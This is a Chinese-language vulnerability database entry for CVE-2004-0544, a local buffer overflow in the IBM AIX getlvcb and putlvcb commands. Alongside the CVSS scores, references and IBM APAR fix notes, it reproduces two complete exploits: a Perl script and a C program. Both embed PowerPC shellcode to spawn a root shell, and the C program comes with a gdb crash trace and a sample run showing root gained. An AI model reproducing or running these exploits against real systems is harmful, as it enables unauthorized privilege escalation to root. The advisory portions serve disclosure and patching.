CVE-2004-0544
CVSS7.2
发布时间 :2004-08-06 00:00:00
修订时间 :2008-09-05 16:38:42
NMCOES    

[原文]Multiple buffer overflows in LVM for AIX 5.1 and 5.2 allow local users to gain privileges via the (1) putlvcb or (2) getlvcb commands.


[CNNVD]AIX Getlvcb本地缓冲区溢出漏洞(CNNVD-200408-074)

        
        IBM AIX是一款商业性质UNIX操作系统。
        AIX getlvcb当把参数拷贝到内存时缺少充分边界检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以root用户权限在系统上执行任意指令。
        提交超长参数给getlvcb执行,可导致缓冲区溢出,不过运行此程序需要root组权限,不过利用其他漏洞(AIX Make CC路径本地缓冲区溢出漏洞)可以root用户权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:ibm:aix:5.1IBM AIX 5.1
cpe:/o:ibm:aix:5.2IBM AIX 5.2
cpe:/o:ibm:aix:4.3.3IBM AIX 4.3.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0544
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0544
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-074
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/9905
(VENDOR_ADVISORY)  BID  9905
http://www.ciac.org/ciac/bulletins/o-131.shtml
(VENDOR_ADVISORY)  CIAC  O-131
http://xforce.iss.net/xforce/xfdb/15555
(VENDOR_ADVISORY)  XF  aix-putlvcb-bo(15555)
http://www-1.ibm.com/support/docview.wss?uid=isg1IY55682
(UNKNOWN)  AIXAPAR  IY55682
http://www-1.ibm.com/support/docview.wss?uid=isg1IY55681
(UNKNOWN)  AIXAPAR  IY55681
http://www-1.ibm.com/services/continuity/recover1.nsf/mss/MSS-OAR-E01-2004.0544.2
(UNKNOWN)  IBM  MSS-OAR-E01-2004.0544
http://secunia.com/advisories/11158/
(UNKNOWN)  SECUNIA  11158
http://xforce.iss.net/xforce/xfdb/18317
(UNKNOWN)  XF  aix-getlvcb-bo(18317)
http://www.securityfocus.com/bid/9906
(UNKNOWN)  BID  9906
http://www.osvdb.org/4393
(UNKNOWN)  OSVDB  4393
http://www.osvdb.org/4392
(UNKNOWN)  OSVDB  4392

- 漏洞信息

AIX Getlvcb本地缓冲区溢出漏洞
高危 边界条件错误
2004-08-06 00:00:00 2005-10-20 00:00:00
本地  
        
        IBM AIX是一款商业性质UNIX操作系统。
        AIX getlvcb当把参数拷贝到内存时缺少充分边界检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以root用户权限在系统上执行任意指令。
        提交超长参数给getlvcb执行,可导致缓冲区溢出,不过运行此程序需要root组权限,不过利用其他漏洞(AIX Make CC路径本地缓冲区溢出漏洞)可以root用户权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        IBM
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www-912.ibm.com/eserver/support/fixes/

- 漏洞信息 (23840)

AIX 4.3.3/5.x Getlvcb Command Line Argument Buffer Overflow Vulnerability (1) (EDBID:23840)
aix local
2003-05-30 Verified
0 watercloud
N/A [点击下载]
source: http://www.securityfocus.com/bid/9905/info

getlvcb has been reported to be prone to a buffer overflow vulnerability.

When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.

An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability.

#!/usr/bin/perl
# FileName: x_getlvcb_aix433_limited.pl
# Exploit getlvcb of Aix4.3.3 to get a uid=0 shell from a gid=0.
# Tested  : on Aix4.3.3.
# Author  : watercloud@xfocus.org
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-5-30
# Announce: use as your owner risk!

$CMD="/usr/sbin/getlvcb";
$_=`/usr/bin/oslevel`;

$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-5-30 ].\n\n";
print "Note :\n";
print "You must get gid=0 befor use this exploit,for example ";
print "my another program x_make_433_limited.pl :)\n";
print "If you get a shell euid=0 then run this command: ";
print "/usr/bin/syscall setreuid 0 0 \\; execve '/bin/sh'\n";

$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();

$ENV{CCC}="AA".$NOP.&getshell($XID,$UID);
$ret=system $CMD ,"AAA"."\x2f\xf2\x2b\x40"x300;

for($i=0;$i<4 && $ret;$i++){
  for($j=0;$j<4 && $ret;$j++) {
    $ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
    system $CMD ,"A"x $j ."\x2f\xf2\x2b\x40"x300;
  }
}

#sub
sub getshell($XID,$GID) {
  my $SHELL,($XID,$GID)=@_;
  $SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
  $SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
  $SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
  $SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
  $SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
  $SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
  $SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
  return $SHELL;
}
#EOF
		

- 漏洞信息 (23841)

AIX 4.3.3/5.x Getlvcb Command Line Argument Buffer Overflow Vulnerability (2) (EDBID:23841)
aix local
2004-03-17 Verified
0 mattox
N/A [点击下载]
source: http://www.securityfocus.com/bid/9905/info
 
getlvcb has been reported to be prone to a buffer overflow vulnerability.
 
When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.
 
An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability.

/********************************************************************
 * Secure Network Operations (http://www.secnetops.com)
 * Local AIX getlvcb Exploit
 * by: mattox@secnetops.com
 * Program Description:
 *
 * Vulnerability Details:
 *
 * # gdb -q /usr/sbin/getlvcb
 * (no debugging symbols found)...(gdb) set args `perl -e 'print "A" x 183'`ABCD
 * (gdb) r
 * Starting program: /usr/sbin/getlvcb `perl -e 'print "A" x 183'`ABCD
 *
 * Program received signal SIGSEGV, Segmentation fault.
 * 0x41424344 in ?? ()
 * (gdb) bt
 * #0  0x41424344 in ?? ()
 * (gdb) i r
 * r0             0x6000328e       1610625678
 * r1             0x2ff228a0       804399264
 * r2             0xf012de88       -267198840
 * r3             0x1      1
 * r4             0x9      9
 * r5             0x2ff22ff8       804401144
 * r6             0xd030   53296
 * r7             0x0      0
 * r8             0x60000000       1610612736
 * r9             0x600039ce       1610627534
 * r10            0x0      0
 * r11            0x6000214a       1610621258
 * r12            0x41424344       1094861636
 * r13            0x200008b0       536873136
 * r14            0x0      0
 * r15            0x0      0
 * r16            0x0      0
 * r17            0x0      0
 * r18            0x0      0
 * r19            0x0      0
 * r20            0x0      0
 * r21            0x0      0
 * r22            0x0      0
 * r23            0x0      0
 * r24            0x0      0
 * r25            0x0      0
 * r26            0x0      0
 * r27            0x0      0
 * r28            0x41414141       1094795585
 * r29            0x41414141       1094795585
 * r30            0x41414141       1094795585
 * r31            0x41414141       1094795585
 * pc             0x41424344       1094861636
 * ps             0x4000d030       1073795120
 * cr             0x26222444       639771716
 * lr             0x41424344       1094861636
 * ctr            0x0      0
 * xer            0x0      0
 * fpscr          0x0      0
 * vscr           0x0      0
 * vrsave         0x0      0
 *
 * .............................................................
 * $ uname -a
 * AIX thunderfoot 1 5 002064864C00
 *
 * $ whoami
 * kinet1k
 *
 * $ id
 * uid=7(kinet1k) gid=1(staff) groups=0(system)
 * $ ./r00tme 208 231
 *
 * Secure Network Operations (written by: mattox@secnetops.com)
 * AIX Local getlvncb exploit
 *
 * Fixin to overwrite the address: 0x2ff2283d
 * Using a buffer size of: 208
 * And an offset of: 231
 *
 * # whoami
 * root
 *
 * # id
 * uid=0(root) gid=1(staff) groups=0(system)
 *..............................................................
 *
 *********************************************************************/
#include <stdlib.h>
#include <string.h>

#define OFFSET                           0
#define BUFFERSIZE                     208
#define NOP             "\x7c\xa5\x2a\x79"
#define RETURNADDR              0x2ff22924

char shellcode[ ] =
        "\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
    "\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
    "\x4c\xc6\x33\x42\x44\xff\xff\x02\xb6\x05\xff\xff\x7e\x94\xa2\x79"
    "\x7e\x84\xa3\x78\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
    "\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
    "\x4c\xc6\x33\x42\x44\xff\xff\x02\xb7\x05\xff\xff\x38\x75\xff\x04"
    "\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
    "\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";


int main( int argc, char *argv[ ] )
{
        int i;
    int offset = OFFSET, bufferSize = BUFFERSIZE;
    unsigned long esp, returnAddress, *addressPointer;
    char *buffer, *pointer;

        /* Usage */
        if( argv[ 1 ] ) {
                if( strncmp( argv[ 1 ], "-h", 3 ) == 0 || strncmp( argv[ 1 ], "-H", 3 ) == 0 ) {
                printf( "\n\tUsage:  %s <buffer size> <offset>\n\n", argv[ 0 ] );
            exit( 0 );
        }
        }

    if( argc > 1 ) {
        bufferSize = atoi( argv[ 1 ] );
    }

    if( argc > 2 ) {
        offset = atoi( argv[ 2 ] );
    }

    returnAddress = RETURNADDR - offset;

    printf( "\nSecure Network Operations (written by: mattox@secnetops.com)\n" );
    printf( "AIX Local getlvncb exploit\n\n" );
    printf( "Fixin to overwrite the address: 0x%x\n", returnAddress );
    printf( "Using a buffer size of: %i\n", bufferSize );
    printf( "And an offset of: %i\n", offset );

    if( !( buffer = malloc( bufferSize ) ) ) {
        printf( "Coundn't allocate memory.\n" );
        exit( 0 );
    }

        /* I know, this is weird stuff...had to sub odd number to get ret addy to align */
    pointer = buffer - 1;

    addressPointer = ( long * )pointer;

    for( i = 0; i < bufferSize; i+=4 ) {
        *( addressPointer++ ) = returnAddress;
    }

    for( i = 0; i < ( bufferSize / 2 ); i+=4 ) {
        buffer[ i ] = ( unsigned long )NOP;
    }

    pointer = buffer + ( ( bufferSize / 2 ) - ( strlen( shellcode )/2 ) );

    for( i = 0; i < strlen( shellcode ); i++ ) {
        *( pointer++ ) = shellcode[ i ];
    }

    buffer[ bufferSize - 1 ] = '\0';

    execl( "/usr/sbin/getlvcb", "getlvcb", buffer, 0 );

    free( buffer );

    return 0;

}

		

- 漏洞信息

4392
IBM AIX getlvcb Local Overflow
Local Access Required Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Unknown

- 漏洞描述

A local overflow exists in IBM AIX. The getlvcb command fails to validate input resulting in a possible buffer overflow. With a specially crafted request, an attacker can cause arbitrary command execution resulting in a loss of confidentiality and/or integrity.

- 时间线

2004-03-22 Unknow
Unknow Unknow

- 解决方案

Upgrade AIX using the APAR numbers AIX 5.1.0:  IY55681 and AIX 5.2.0:  IY55682 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

AIX Getlvcb Command Line Argument Buffer Overflow Vulnerability
Boundary Condition Error 9905
No Yes
2004-03-17 12:00:00 2009-07-12 03:06:00
Discovery of this vulnerability has been credited to watercloud <watercloud@xfocus.org>.

- 受影响的程序版本

IBM AIX 4.3.3
IBM AIX 5.2
IBM AIX 5.1

- 漏洞讨论

getlvcb has been reported to be prone to a buffer overflow vulnerability.

When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.

An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability.

- 漏洞利用

The following proof of concept exploits have been supplied:

- 解决方案

IBM has released an update to their original advisory (APR-22-2004-LVM) as well as official APAR fixes; these fixes supercede the previous efixes. Further information regarding obtaining and applying APARs can be found in the referenced advisory.


IBM AIX 5.1

IBM AIX 5.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站